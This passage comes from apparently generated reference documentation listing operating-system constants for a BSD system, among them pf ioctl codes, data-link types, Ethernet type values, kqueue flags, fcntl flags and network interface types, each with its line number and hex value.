0xc44c4446 constant DIOCRGETASTATS (line 227) | DIOCRGETASTATS = 0xc44c4447 constant DIOCRGETTABLES (line 228) | DIOCRGETTABLES = 0xc44c443f constant DIOCRGETTSTATS (line 229) | DIOCRGETTSTATS = 0xc44c4440 constant DIOCRINADEFINE (line 230) | DIOCRINADEFINE = 0xc44c444d constant DIOCRSETADDRS (line 231) | DIOCRSETADDRS = 0xc44c4445 constant DIOCRSETTFLAGS (line 232) | DIOCRSETTFLAGS = 0xc44c444a constant DIOCRTSTADDRS (line 233) | DIOCRTSTADDRS = 0xc44c4449 constant DIOCSETDEBUG (line 234) | DIOCSETDEBUG = 0xc0044418 constant DIOCSETHOSTID (line 235) | DIOCSETHOSTID = 0xc0044456 constant DIOCSETIFFLAG (line 236) | DIOCSETIFFLAG = 0xc0244459 constant DIOCSETLIMIT (line 237) | DIOCSETLIMIT = 0xc0084428 constant DIOCSETREASS (line 238) | DIOCSETREASS = 0xc004445c constant DIOCSETSTATUSIF (line 239) | DIOCSETSTATUSIF = 0xc0244414 constant DIOCSETSYNCOOKIES (line 240) | DIOCSETSYNCOOKIES = 0xc0014462 constant DIOCSETSYNFLWATS (line 241) | DIOCSETSYNFLWATS = 0xc0084461 constant DIOCSETTIMEOUT (line 242) | DIOCSETTIMEOUT = 0xc008441d constant DIOCSTART (line 243) | DIOCSTART = 0x20004401 constant DIOCSTOP (line 244) | DIOCSTOP = 0x20004402 constant DIOCXBEGIN (line 245) | DIOCXBEGIN = 0xc00c4451 constant DIOCXCOMMIT (line 246) | DIOCXCOMMIT = 0xc00c4452 constant DIOCXROLLBACK (line 247) | DIOCXROLLBACK = 0xc00c4453 constant DLT_ARCNET (line 248) | DLT_ARCNET = 0x7 constant DLT_ATM_RFC1483 (line 249) | DLT_ATM_RFC1483 = 0xb constant DLT_AX25 (line 250) | DLT_AX25 = 0x3 constant DLT_CHAOS (line 251) | DLT_CHAOS = 0x5 constant DLT_C_HDLC (line 252) | DLT_C_HDLC = 0x68 constant DLT_EN10MB (line 253) | DLT_EN10MB = 0x1 constant DLT_EN3MB (line 254) | DLT_EN3MB = 0x2 constant DLT_ENC (line 255) | DLT_ENC = 0xd constant DLT_FDDI (line 256) | DLT_FDDI = 0xa constant DLT_IEEE802 (line 257) | DLT_IEEE802 = 0x6 constant DLT_IEEE802_11 (line 258) | DLT_IEEE802_11 = 0x69 constant DLT_IEEE802_11_RADIO (line 259) | DLT_IEEE802_11_RADIO = 0x7f constant DLT_LOOP (line 260) | DLT_LOOP = 0xc constant DLT_MPLS (line 261) | DLT_MPLS = 0xdb constant DLT_NULL (line 262) | DLT_NULL = 0x0 constant DLT_OPENFLOW (line 263) | DLT_OPENFLOW = 0x10b constant DLT_PFLOG (line 264) | DLT_PFLOG = 0x75 constant DLT_PFSYNC (line 265) | DLT_PFSYNC = 0x12 constant DLT_PPP (line 266) | DLT_PPP = 0x9 constant DLT_PPP_BSDOS (line 267) | DLT_PPP_BSDOS = 0x10 constant DLT_PPP_ETHER (line 268) | DLT_PPP_ETHER = 0x33 constant DLT_PPP_SERIAL (line 269) | DLT_PPP_SERIAL = 0x32 constant DLT_PRONET (line 270) | DLT_PRONET = 0x4 constant DLT_RAW (line 271) | DLT_RAW = 0xe constant DLT_SLIP (line 272) | DLT_SLIP = 0x8 constant DLT_SLIP_BSDOS (line 273) | DLT_SLIP_BSDOS = 0xf constant DLT_USBPCAP (line 274) | DLT_USBPCAP = 0xf9 constant DLT_USER0 (line 275) | DLT_USER0 = 0x93 constant DLT_USER1 (line 276) | DLT_USER1 = 0x94 constant DLT_USER10 (line 277) | DLT_USER10 = 0x9d constant DLT_USER11 (line 278) | DLT_USER11 = 0x9e constant DLT_USER12 (line 279) | DLT_USER12 = 0x9f constant DLT_USER13 (line 280) | DLT_USER13 = 0xa0 constant DLT_USER14 (line 281) | DLT_USER14 = 0xa1 constant DLT_USER15 (line 282) | DLT_USER15 = 0xa2 constant DLT_USER2 (line 283) | DLT_USER2 = 0x95 constant DLT_USER3 (line 284) | DLT_USER3 = 0x96 constant DLT_USER4 (line 285) | DLT_USER4 = 0x97 constant DLT_USER5 (line 286) | DLT_USER5 = 0x98 constant DLT_USER6 (line 287) | DLT_USER6 = 0x99 constant DLT_USER7 (line 288) | DLT_USER7 = 0x9a constant DLT_USER8 (line 289) | DLT_USER8 = 0x9b constant DLT_USER9 (line 290) | DLT_USER9 = 0x9c constant DT_BLK (line 291) | DT_BLK = 0x6 constant DT_CHR (line 292) | DT_CHR = 0x2 constant DT_DIR (line 293) | DT_DIR = 0x4 constant DT_FIFO (line 294) | DT_FIFO = 0x1 constant DT_LNK (line 295) | DT_LNK = 0xa constant DT_REG (line 296) | DT_REG = 0x8 constant DT_SOCK (line 297) | DT_SOCK = 0xc constant DT_UNKNOWN (line 298) | DT_UNKNOWN = 0x0 constant ECHO (line 299) | ECHO = 0x8 constant ECHOCTL (line 300) | ECHOCTL = 0x40 constant ECHOE (line 301) | ECHOE = 0x2 constant ECHOK (line 302) | ECHOK = 0x4 constant ECHOKE (line 303) | ECHOKE = 0x1 constant ECHONL (line 304) | ECHONL = 0x10 constant ECHOPRT (line 305) | ECHOPRT = 0x20 constant EMT_TAGOVF (line 306) | EMT_TAGOVF = 0x1 constant EMUL_ENABLED (line 307) | EMUL_ENABLED = 0x1 constant EMUL_NATIVE (line 308) | EMUL_NATIVE = 0x2 constant ENDRUNDISC (line 309) | ENDRUNDISC = 0x9 constant ETH64_8021_RSVD_MASK (line 310) | ETH64_8021_RSVD_MASK = 0xfffffffffff0 constant ETH64_8021_RSVD_PREFIX (line 311) | ETH64_8021_RSVD_PREFIX = 0x180c2000000 constant ETHERMIN (line 312) | ETHERMIN = 0x2e constant ETHERMTU (line 313) | ETHERMTU = 0x5dc constant ETHERTYPE_8023 (line 314) | ETHERTYPE_8023 = 0x4 constant ETHERTYPE_AARP (line 315) | ETHERTYPE_AARP = 0x80f3 constant ETHERTYPE_ACCTON (line 316) | ETHERTYPE_ACCTON = 0x8390 constant ETHERTYPE_AEONIC (line 317) | ETHERTYPE_AEONIC = 0x8036 constant ETHERTYPE_ALPHA (line 318) | ETHERTYPE_ALPHA = 0x814a constant ETHERTYPE_AMBER (line 319) | ETHERTYPE_AMBER = 0x6008 constant ETHERTYPE_AMOEBA (line 320) | ETHERTYPE_AMOEBA = 0x8145 constant ETHERTYPE_AOE (line 321) | ETHERTYPE_AOE = 0x88a2 constant ETHERTYPE_APOLLO (line 322) | ETHERTYPE_APOLLO = 0x80f7 constant ETHERTYPE_APOLLODOMAIN (line 323) | ETHERTYPE_APOLLODOMAIN = 0x8019 constant ETHERTYPE_APPLETALK (line 324) | ETHERTYPE_APPLETALK = 0x809b constant ETHERTYPE_APPLITEK (line 325) | ETHERTYPE_APPLITEK = 0x80c7 constant ETHERTYPE_ARGONAUT (line 326) | ETHERTYPE_ARGONAUT = 0x803a constant ETHERTYPE_ARP (line 327) | ETHERTYPE_ARP = 0x806 constant ETHERTYPE_AT (line 328) | ETHERTYPE_AT = 0x809b constant ETHERTYPE_ATALK (line 329) | ETHERTYPE_ATALK = 0x809b constant ETHERTYPE_ATOMIC (line 330) | ETHERTYPE_ATOMIC = 0x86df constant ETHERTYPE_ATT (line 331) | ETHERTYPE_ATT = 0x8069 constant ETHERTYPE_ATTSTANFORD (line 332) | ETHERTYPE_ATTSTANFORD = 0x8008 constant ETHERTYPE_AUTOPHON (line 333) | ETHERTYPE_AUTOPHON = 0x806a constant ETHERTYPE_AXIS (line 334) | ETHERTYPE_AXIS = 0x8856 constant ETHERTYPE_BCLOOP (line 335) | ETHERTYPE_BCLOOP = 0x9003 constant ETHERTYPE_BOFL (line 336) | ETHERTYPE_BOFL = 0x8102 constant ETHERTYPE_CABLETRON (line 337) | ETHERTYPE_CABLETRON = 0x7034 constant ETHERTYPE_CHAOS (line 338) | ETHERTYPE_CHAOS = 0x804 constant ETHERTYPE_COMDESIGN (line 339) | ETHERTYPE_COMDESIGN = 0x806c constant ETHERTYPE_COMPUGRAPHIC (line 340) | ETHERTYPE_COMPUGRAPHIC = 0x806d constant ETHERTYPE_COUNTERPOINT (line 341) | ETHERTYPE_COUNTERPOINT = 0x8062 constant ETHERTYPE_CRONUS (line 342) | ETHERTYPE_CRONUS = 0x8004 constant ETHERTYPE_CRONUSVLN (line 343) | ETHERTYPE_CRONUSVLN = 0x8003 constant ETHERTYPE_DCA (line 344) | ETHERTYPE_DCA = 0x1234 constant ETHERTYPE_DDE (line 345) | ETHERTYPE_DDE = 0x807b constant ETHERTYPE_DEBNI (line 346) | ETHERTYPE_DEBNI = 0xaaaa constant ETHERTYPE_DECAM (line 347) | ETHERTYPE_DECAM = 0x8048 constant ETHERTYPE_DECCUST (line 348) | ETHERTYPE_DECCUST = 0x6006 constant ETHERTYPE_DECDIAG (line 349) | ETHERTYPE_DECDIAG = 0x6005 constant ETHERTYPE_DECDNS (line 350) | ETHERTYPE_DECDNS = 0x803c constant ETHERTYPE_DECDTS (line 351) | ETHERTYPE_DECDTS = 0x803e constant ETHERTYPE_DECEXPER (line 352) | ETHERTYPE_DECEXPER = 0x6000 constant ETHERTYPE_DECLAST (line 353) | ETHERTYPE_DECLAST = 0x8041 constant ETHERTYPE_DECLTM (line 354) | ETHERTYPE_DECLTM = 0x803f constant ETHERTYPE_DECMUMPS (line 355) | ETHERTYPE_DECMUMPS = 0x6009 constant ETHERTYPE_DECNETBIOS (line 356) | ETHERTYPE_DECNETBIOS = 0x8040 constant ETHERTYPE_DELTACON (line 357) | ETHERTYPE_DELTACON = 0x86de constant ETHERTYPE_DIDDLE (line 358) | ETHERTYPE_DIDDLE = 0x4321 constant ETHERTYPE_DLOG1 (line 359) | ETHERTYPE_DLOG1 = 0x660 constant ETHERTYPE_DLOG2 (line 360) | ETHERTYPE_DLOG2 = 0x661 constant ETHERTYPE_DN (line 361) | ETHERTYPE_DN = 0x6003 constant ETHERTYPE_DOGFIGHT (line 362) | ETHERTYPE_DOGFIGHT = 0x1989 constant ETHERTYPE_DSMD (line 363) | ETHERTYPE_DSMD = 0x8039 constant ETHERTYPE_EAPOL (line 364) | ETHERTYPE_EAPOL = 0x888e constant ETHERTYPE_ECMA (line 365) | ETHERTYPE_ECMA = 0x803 constant ETHERTYPE_ENCRYPT (line 366) | ETHERTYPE_ENCRYPT = 0x803d constant ETHERTYPE_ES (line 367) | ETHERTYPE_ES = 0x805d constant ETHERTYPE_EXCELAN (line 368) | ETHERTYPE_EXCELAN = 0x8010 constant ETHERTYPE_EXPERDATA (line 369) | ETHERTYPE_EXPERDATA = 0x8049 constant ETHERTYPE_FLIP (line 370) | ETHERTYPE_FLIP = 0x8146 constant ETHERTYPE_FLOWCONTROL (line 371) | ETHERTYPE_FLOWCONTROL = 0x8808 constant ETHERTYPE_FRARP (line 372) | ETHERTYPE_FRARP = 0x808 constant ETHERTYPE_GENDYN (line 373) | ETHERTYPE_GENDYN = 0x8068 constant ETHERTYPE_HAYES (line 374) | ETHERTYPE_HAYES = 0x8130 constant ETHERTYPE_HIPPI_FP (line 375) | ETHERTYPE_HIPPI_FP = 0x8180 constant ETHERTYPE_HITACHI (line 376) | ETHERTYPE_HITACHI = 0x8820 constant ETHERTYPE_HP (line 377) | ETHERTYPE_HP = 0x8005 constant ETHERTYPE_IEEEPUP (line 378) | ETHERTYPE_IEEEPUP = 0xa00 constant ETHERTYPE_IEEEPUPAT (line 379) | ETHERTYPE_IEEEPUPAT = 0xa01 constant ETHERTYPE_IMLBL (line 380) | ETHERTYPE_IMLBL = 0x4c42 constant ETHERTYPE_IMLBLDIAG (line 381) | ETHERTYPE_IMLBLDIAG = 0x424c constant ETHERTYPE_IP (line 382) | ETHERTYPE_IP = 0x800 constant ETHERTYPE_IPAS (line 383) | ETHERTYPE_IPAS = 0x876c constant ETHERTYPE_IPV6 (line 384) | ETHERTYPE_IPV6 = 0x86dd constant ETHERTYPE_IPX (line 385) | ETHERTYPE_IPX = 0x8137 constant ETHERTYPE_IPXNEW (line 386) | ETHERTYPE_IPXNEW = 0x8037 constant ETHERTYPE_KALPANA (line 387) | ETHERTYPE_KALPANA = 0x8582 constant ETHERTYPE_LANBRIDGE (line 388) | ETHERTYPE_LANBRIDGE = 0x8038 constant ETHERTYPE_LANPROBE (line 389) | ETHERTYPE_LANPROBE = 0x8888 constant ETHERTYPE_LAT (line 390) | ETHERTYPE_LAT = 0x6004 constant ETHERTYPE_LBACK (line 391) | ETHERTYPE_LBACK = 0x9000 constant ETHERTYPE_LITTLE (line 392) | ETHERTYPE_LITTLE = 0x8060 constant ETHERTYPE_LLDP (line 393) | ETHERTYPE_LLDP = 0x88cc constant ETHERTYPE_LOGICRAFT (line 394) | ETHERTYPE_LOGICRAFT = 0x8148 constant ETHERTYPE_LOOPBACK (line 395) | ETHERTYPE_LOOPBACK = 0x9000 constant ETHERTYPE_MACSEC (line 396) | ETHERTYPE_MACSEC = 0x88e5 constant ETHERTYPE_MATRA (line 397) | ETHERTYPE_MATRA = 0x807a constant ETHERTYPE_MAX (line 398) | ETHERTYPE_MAX = 0xffff constant ETHERTYPE_MERIT (line 399) | ETHERTYPE_MERIT = 0x807c constant ETHERTYPE_MICP (line 400) | ETHERTYPE_MICP = 0x873a constant ETHERTYPE_MOPDL (line 401) | ETHERTYPE_MOPDL = 0x6001 constant ETHERTYPE_MOPRC (line 402) | ETHERTYPE_MOPRC = 0x6002 constant ETHERTYPE_MOTOROLA (line 403) | ETHERTYPE_MOTOROLA = 0x818d constant ETHERTYPE_MPLS (line 404) | ETHERTYPE_MPLS = 0x8847 constant ETHERTYPE_MPLS_MCAST (line 405) | ETHERTYPE_MPLS_MCAST = 0x8848 constant ETHERTYPE_MUMPS (line 406) | ETHERTYPE_MUMPS = 0x813f constant ETHERTYPE_NBPCC (line 407) | ETHERTYPE_NBPCC = 0x3c04 constant ETHERTYPE_NBPCLAIM (line 408) | ETHERTYPE_NBPCLAIM = 0x3c09 constant ETHERTYPE_NBPCLREQ (line 409) | ETHERTYPE_NBPCLREQ = 0x3c05 constant ETHERTYPE_NBPCLRSP (line 410) | ETHERTYPE_NBPCLRSP = 0x3c06 constant ETHERTYPE_NBPCREQ (line 411) | ETHERTYPE_NBPCREQ = 0x3c02 constant ETHERTYPE_NBPCRSP (line 412) | ETHERTYPE_NBPCRSP = 0x3c03 constant ETHERTYPE_NBPDG (line 413) | ETHERTYPE_NBPDG = 0x3c07 constant ETHERTYPE_NBPDGB (line 414) | ETHERTYPE_NBPDGB = 0x3c08 constant ETHERTYPE_NBPDLTE (line 415) | ETHERTYPE_NBPDLTE = 0x3c0a constant ETHERTYPE_NBPRAR (line 416) | ETHERTYPE_NBPRAR = 0x3c0c constant ETHERTYPE_NBPRAS (line 417) | ETHERTYPE_NBPRAS = 0x3c0b constant ETHERTYPE_NBPRST (line 418) | ETHERTYPE_NBPRST = 0x3c0d constant ETHERTYPE_NBPSCD (line 419) | ETHERTYPE_NBPSCD = 0x3c01 constant ETHERTYPE_NBPVCD (line 420) | ETHERTYPE_NBPVCD = 0x3c00 constant ETHERTYPE_NBS (line 421) | ETHERTYPE_NBS = 0x802 constant ETHERTYPE_NCD (line 422) | ETHERTYPE_NCD = 0x8149 constant ETHERTYPE_NESTAR (line 423) | ETHERTYPE_NESTAR = 0x8006 constant ETHERTYPE_NETBEUI (line 424) | ETHERTYPE_NETBEUI = 0x8191 constant ETHERTYPE_NHRP (line 425) | ETHERTYPE_NHRP = 0x2001 constant ETHERTYPE_NOVELL (line 426) | ETHERTYPE_NOVELL = 0x8138 constant ETHERTYPE_NS (line 427) | ETHERTYPE_NS = 0x600 constant ETHERTYPE_NSAT (line 428) | ETHERTYPE_NSAT = 0x601 constant ETHERTYPE_NSCOMPAT (line 429) | ETHERTYPE_NSCOMPAT = 0x807 constant ETHERTYPE_NSH (line 430) | ETHERTYPE_NSH = 0x984f constant ETHERTYPE_NTRAILER (line 431) | ETHERTYPE_NTRAILER = 0x10 constant ETHERTYPE_OS9 (line 432) | ETHERTYPE_OS9 = 0x7007 constant ETHERTYPE_OS9NET (line 433) | ETHERTYPE_OS9NET = 0x7009 constant ETHERTYPE_PACER (line 434) | ETHERTYPE_PACER = 0x80c6 constant ETHERTYPE_PBB (line 435) | ETHERTYPE_PBB = 0x88e7 constant ETHERTYPE_PCS (line 436) | ETHERTYPE_PCS = 0x4242 constant ETHERTYPE_PLANNING (line 437) | ETHERTYPE_PLANNING = 0x8044 constant ETHERTYPE_PPP (line 438) | ETHERTYPE_PPP = 0x880b constant ETHERTYPE_PPPOE (line 439) | ETHERTYPE_PPPOE = 0x8864 constant ETHERTYPE_PPPOEDISC (line 440) | ETHERTYPE_PPPOEDISC = 0x8863 constant ETHERTYPE_PRIMENTS (line 441) | ETHERTYPE_PRIMENTS = 0x7031 constant ETHERTYPE_PUP (line 442) | ETHERTYPE_PUP = 0x200 constant ETHERTYPE_PUPAT (line 443) | ETHERTYPE_PUPAT = 0x200 constant ETHERTYPE_QINQ (line 444) | ETHERTYPE_QINQ = 0x88a8 constant ETHERTYPE_RACAL (line 445) | ETHERTYPE_RACAL = 0x7030 constant ETHERTYPE_RATIONAL (line 446) | ETHERTYPE_RATIONAL = 0x8150 constant ETHERTYPE_RAWFR (line 447) | ETHERTYPE_RAWFR = 0x6559 constant ETHERTYPE_RCL (line 448) | ETHERTYPE_RCL = 0x1995 constant ETHERTYPE_RDP (line 449) | ETHERTYPE_RDP = 0x8739 constant ETHERTYPE_RETIX (line 450) | ETHERTYPE_RETIX = 0x80f2 constant ETHERTYPE_REVARP (line 451) | ETHERTYPE_REVARP = 0x8035 constant ETHERTYPE_SCA (line 452) | ETHERTYPE_SCA = 0x6007 constant ETHERTYPE_SECTRA (line 453) | ETHERTYPE_SECTRA = 0x86db constant ETHERTYPE_SECUREDATA (line 454) | ETHERTYPE_SECUREDATA = 0x876d constant ETHERTYPE_SGITW (line 455) | ETHERTYPE_SGITW = 0x817e constant ETHERTYPE_SG_BOUNCE (line 456) | ETHERTYPE_SG_BOUNCE = 0x8016 constant ETHERTYPE_SG_DIAG (line 457) | ETHERTYPE_SG_DIAG = 0x8013 constant ETHERTYPE_SG_NETGAMES (line 458) | ETHERTYPE_SG_NETGAMES = 0x8014 constant ETHERTYPE_SG_RESV (line 459) | ETHERTYPE_SG_RESV = 0x8015 constant ETHERTYPE_SIMNET (line 460) | ETHERTYPE_SIMNET = 0x5208 constant ETHERTYPE_SLOW (line 461) | ETHERTYPE_SLOW = 0x8809 constant ETHERTYPE_SNA (line 462) | ETHERTYPE_SNA = 0x80d5 constant ETHERTYPE_SNMP (line 463) | ETHERTYPE_SNMP = 0x814c constant ETHERTYPE_SONIX (line 464) | ETHERTYPE_SONIX = 0xfaf5 constant ETHERTYPE_SPIDER (line 465) | ETHERTYPE_SPIDER = 0x809f constant ETHERTYPE_SPRITE (line 466) | ETHERTYPE_SPRITE = 0x500 constant ETHERTYPE_STP (line 467) | ETHERTYPE_STP = 0x8181 constant ETHERTYPE_TALARIS (line 468) | ETHERTYPE_TALARIS = 0x812b constant ETHERTYPE_TALARISMC (line 469) | ETHERTYPE_TALARISMC = 0x852b constant ETHERTYPE_TCPCOMP (line 470) | ETHERTYPE_TCPCOMP = 0x876b constant ETHERTYPE_TCPSM (line 471) | ETHERTYPE_TCPSM = 0x9002 constant ETHERTYPE_TEC (line 472) | ETHERTYPE_TEC = 0x814f constant ETHERTYPE_TIGAN (line 473) | ETHERTYPE_TIGAN = 0x802f constant ETHERTYPE_TRAIL (line 474) | ETHERTYPE_TRAIL = 0x1000 constant ETHERTYPE_TRANSETHER (line 475) | ETHERTYPE_TRANSETHER = 0x6558 constant ETHERTYPE_TYMSHARE (line 476) | ETHERTYPE_TYMSHARE = 0x802e constant ETHERTYPE_UBBST (line 477) | ETHERTYPE_UBBST = 0x7005 constant ETHERTYPE_UBDEBUG (line 478) | ETHERTYPE_UBDEBUG = 0x900 constant ETHERTYPE_UBDIAGLOOP (line 479) | ETHERTYPE_UBDIAGLOOP = 0x7002 constant ETHERTYPE_UBDL (line 480) | ETHERTYPE_UBDL = 0x7000 constant ETHERTYPE_UBNIU (line 481) | ETHERTYPE_UBNIU = 0x7001 constant ETHERTYPE_UBNMC (line 482) | ETHERTYPE_UBNMC = 0x7003 constant ETHERTYPE_VALID (line 483) | ETHERTYPE_VALID = 0x1600 constant ETHERTYPE_VARIAN (line 484) | ETHERTYPE_VARIAN = 0x80dd constant ETHERTYPE_VAXELN (line 485) | ETHERTYPE_VAXELN = 0x803b constant ETHERTYPE_VEECO (line 486) | ETHERTYPE_VEECO = 0x8067 constant ETHERTYPE_VEXP (line 487) | ETHERTYPE_VEXP = 0x805b constant ETHERTYPE_VGLAB (line 488) | ETHERTYPE_VGLAB = 0x8131 constant ETHERTYPE_VINES (line 489) | ETHERTYPE_VINES = 0xbad constant ETHERTYPE_VINESECHO (line 490) | ETHERTYPE_VINESECHO = 0xbaf constant ETHERTYPE_VINESLOOP (line 491) | ETHERTYPE_VINESLOOP = 0xbae constant ETHERTYPE_VITAL (line 492) | ETHERTYPE_VITAL = 0xff00 constant ETHERTYPE_VLAN (line 493) | ETHERTYPE_VLAN = 0x8100 constant ETHERTYPE_VLTLMAN (line 494) | ETHERTYPE_VLTLMAN = 0x8080 constant ETHERTYPE_VPROD (line 495) | ETHERTYPE_VPROD = 0x805c constant ETHERTYPE_VURESERVED (line 496) | ETHERTYPE_VURESERVED = 0x8147 constant ETHERTYPE_WATERLOO (line 497) | ETHERTYPE_WATERLOO = 0x8130 constant ETHERTYPE_WELLFLEET (line 498) | ETHERTYPE_WELLFLEET = 0x8103 constant ETHERTYPE_X25 (line 499) | ETHERTYPE_X25 = 0x805 constant ETHERTYPE_X75 (line 500) | ETHERTYPE_X75 = 0x801 constant ETHERTYPE_XNSSM (line 501) | ETHERTYPE_XNSSM = 0x9001 constant ETHERTYPE_XTP (line 502) | ETHERTYPE_XTP = 0x817d constant ETHER_ADDR_LEN (line 503) | ETHER_ADDR_LEN = 0x6 constant ETHER_ALIGN (line 504) | ETHER_ALIGN = 0x2 constant ETHER_CRC_LEN (line 505) | ETHER_CRC_LEN = 0x4 constant ETHER_CRC_POLY_BE (line 506) | ETHER_CRC_POLY_BE = 0x4c11db6 constant ETHER_CRC_POLY_LE (line 507) | ETHER_CRC_POLY_LE = 0xedb88320 constant ETHER_HDR_LEN (line 508) | ETHER_HDR_LEN = 0xe constant ETHER_MAX_DIX_LEN (line 509) | ETHER_MAX_DIX_LEN = 0x600 constant ETHER_MAX_HARDMTU_LEN (line 510) | ETHER_MAX_HARDMTU_LEN = 0xff9b constant ETHER_MAX_LEN (line 511) | ETHER_MAX_LEN = 0x5ee constant ETHER_MIN_LEN (line 512) | ETHER_MIN_LEN = 0x40 constant ETHER_TYPE_LEN (line 513) | ETHER_TYPE_LEN = 0x2 constant ETHER_VLAN_ENCAP_LEN (line 514) | ETHER_VLAN_ENCAP_LEN = 0x4 constant EVFILT_AIO (line 515) | EVFILT_AIO = -0x3 constant EVFILT_DEVICE (line 516) | EVFILT_DEVICE = -0x8 constant EVFILT_EXCEPT (line 517) | EVFILT_EXCEPT = -0x9 constant EVFILT_PROC (line 518) | EVFILT_PROC = -0x5 constant EVFILT_READ (line 519) | EVFILT_READ = -0x1 constant EVFILT_SIGNAL (line 520) | EVFILT_SIGNAL = -0x6 constant EVFILT_SYSCOUNT (line 521) | EVFILT_SYSCOUNT = 0x9 constant EVFILT_TIMER (line 522) | EVFILT_TIMER = -0x7 constant EVFILT_VNODE (line 523) | EVFILT_VNODE = -0x4 constant EVFILT_WRITE (line 524) | EVFILT_WRITE = -0x2 constant EVL_ENCAPLEN (line 525) | EVL_ENCAPLEN = 0x4 constant EVL_PRIO_BITS (line 526) | EVL_PRIO_BITS = 0xd constant EVL_PRIO_MAX (line 527) | EVL_PRIO_MAX = 0x7 constant EVL_VLID_MASK (line 528) | EVL_VLID_MASK = 0xfff constant EVL_VLID_MAX (line 529) | EVL_VLID_MAX = 0xffe constant EVL_VLID_MIN (line 530) | EVL_VLID_MIN = 0x1 constant EVL_VLID_NULL (line 531) | EVL_VLID_NULL = 0x0 constant EV_ADD (line 532) | EV_ADD = 0x1 constant EV_CLEAR (line 533) | EV_CLEAR = 0x20 constant EV_DELETE (line 534) | EV_DELETE = 0x2 constant EV_DISABLE (line 535) | EV_DISABLE = 0x8 constant EV_DISPATCH (line 536) | EV_DISPATCH = 0x80 constant EV_ENABLE (line 537) | EV_ENABLE = 0x4 constant EV_EOF (line 538) | EV_EOF = 0x8000 constant EV_ERROR (line 539) | EV_ERROR = 0x4000 constant EV_FLAG1 (line 540) | EV_FLAG1 = 0x2000 constant EV_ONESHOT (line 541) | EV_ONESHOT = 0x10 constant EV_RECEIPT (line 542) | EV_RECEIPT = 0x40 constant EV_SYSFLAGS (line 543) | EV_SYSFLAGS = 0xf800 constant EXTA (line 544) | EXTA = 0x4b00 constant EXTB (line 545) | EXTB = 0x9600 constant EXTPROC (line 546) | EXTPROC = 0x800 constant FD_CLOEXEC (line 547) | FD_CLOEXEC = 0x1 constant FD_SETSIZE (line 548) | FD_SETSIZE = 0x400 constant FLUSHO (line 549) | FLUSHO = 0x800000 constant F_DUPFD (line 550) | F_DUPFD = 0x0 constant F_DUPFD_CLOEXEC (line 551) | F_DUPFD_CLOEXEC = 0xa constant F_GETFD (line 552) | F_GETFD = 0x1 constant F_GETFL (line 553) | F_GETFL = 0x3 constant F_GETLK (line 554) | F_GETLK = 0x7 constant F_GETOWN (line 555) | F_GETOWN = 0x5 constant F_ISATTY (line 556) | F_ISATTY = 0xb constant F_OK (line 557) | F_OK = 0x0 constant F_RDLCK (line 558) | F_RDLCK = 0x1 constant F_SETFD (line 559) | F_SETFD = 0x2 constant F_SETFL (line 560) | F_SETFL = 0x4 constant F_SETLK (line 561) | F_SETLK = 0x8 constant F_SETLKW (line 562) | F_SETLKW = 0x9 constant F_SETOWN (line 563) | F_SETOWN = 0x6 constant F_UNLCK (line 564) | F_UNLCK = 0x2 constant F_WRLCK (line 565) | F_WRLCK = 0x3 constant HUPCL (line 566) | HUPCL = 0x4000 constant HW_MACHINE (line 567) | HW_MACHINE = 0x1 constant ICANON (line 568) | ICANON = 0x100 constant ICMP6_FILTER (line 569) | ICMP6_FILTER = 0x12 constant ICRNL (line 570) | ICRNL = 0x100 constant IEXTEN (line 571) | IEXTEN = 0x400 constant IFAN_ARRIVAL (line 572) | IFAN_ARRIVAL = 0x0 constant IFAN_DEPARTURE (line 573) | IFAN_DEPARTURE = 0x1 constant IFF_ALLMULTI (line 574) | IFF_ALLMULTI = 0x200 constant IFF_BROADCAST (line 575) | IFF_BROADCAST = 0x2 constant IFF_CANTCHANGE (line 576) | IFF_CANTCHANGE = 0x8e52 constant IFF_DEBUG (line 577) | IFF_DEBUG = 0x4 constant IFF_LINK0 (line 578) | IFF_LINK0 = 0x1000 constant IFF_LINK1 (line 579) | IFF_LINK1 = 0x2000 constant IFF_LINK2 (line 580) | IFF_LINK2 = 0x4000 constant IFF_LOOPBACK (line 581) | IFF_LOOPBACK = 0x8 constant IFF_MULTICAST (line 582) | IFF_MULTICAST = 0x8000 constant IFF_NOARP (line 583) | IFF_NOARP = 0x80 constant IFF_OACTIVE (line 584) | IFF_OACTIVE = 0x400 constant IFF_POINTOPOINT (line 585) | IFF_POINTOPOINT = 0x10 constant IFF_PROMISC (line 586) | IFF_PROMISC = 0x100 constant IFF_RUNNING (line 587) | IFF_RUNNING = 0x40 constant IFF_SIMPLEX (line 588) | IFF_SIMPLEX = 0x800 constant IFF_STATICARP (line 589) | IFF_STATICARP = 0x20 constant IFF_UP (line 590) | IFF_UP = 0x1 constant IFNAMSIZ (line 591) | IFNAMSIZ = 0x10 constant IFT_1822 (line 592) | IFT_1822 = 0x2 constant IFT_A12MPPSWITCH (line 593) | IFT_A12MPPSWITCH = 0x82 constant IFT_AAL2 (line 594) | IFT_AAL2 = 0xbb constant IFT_AAL5 (line 595) | IFT_AAL5 = 0x31 constant IFT_ADSL (line 596) | IFT_ADSL = 0x5e constant IFT_AFLANE8023 (line 597) | IFT_AFLANE8023 = 0x3b constant IFT_AFLANE8025 (line 598) | IFT_AFLANE8025 = 0x3c constant IFT_ARAP (line 599) | IFT_ARAP = 0x58 constant IFT_ARCNET (line 600) | IFT_ARCNET = 0x23 constant IFT_ARCNETPLUS (line 601) | IFT_ARCNETPLUS = 0x24 constant IFT_ASYNC (line 602) | IFT_ASYNC = 0x54 constant IFT_ATM (line 603) | IFT_ATM = 0x25 constant IFT_ATMDXI (line 604) | IFT_ATMDXI = 0x69 constant IFT_ATMFUNI (line 605) | IFT_ATMFUNI = 0x6a constant IFT_ATMIMA (line 606) | IFT_ATMIMA = 0x6b constant IFT_ATMLOGICAL (line 607) | IFT_ATMLOGICAL = 0x50 constant IFT_ATMRADIO (line 608) | IFT_ATMRADIO = 0xbd constant IFT_ATMSUBINTERFACE (line 609) | IFT_ATMSUBINTERFACE = 0x86 constant IFT_ATMVCIENDPT (line 610) | IFT_ATMVCIENDPT = 0xc2 constant IFT_ATMVIRTUAL (line 611) | IFT_ATMVIRTUAL = 0x95 constant IFT_BGPPOLICYACCOUNTING (line 612) | IFT_BGPPOLICYACCOUNTING = 0xa2 constant IFT_BLUETOOTH (line 613) | IFT_BLUETOOTH = 0xf8 constant IFT_BRIDGE (line 614) | IFT_BRIDGE = 0xd1 constant IFT_BSC (line 615) | IFT_BSC = 0x53 constant IFT_CARP (line 616) | IFT_CARP = 0xf7 constant IFT_CCTEMUL (line 617) | IFT_CCTEMUL = 0x3d constant IFT_CEPT (line 618) | IFT_CEPT = 0x13 constant IFT_CES (line 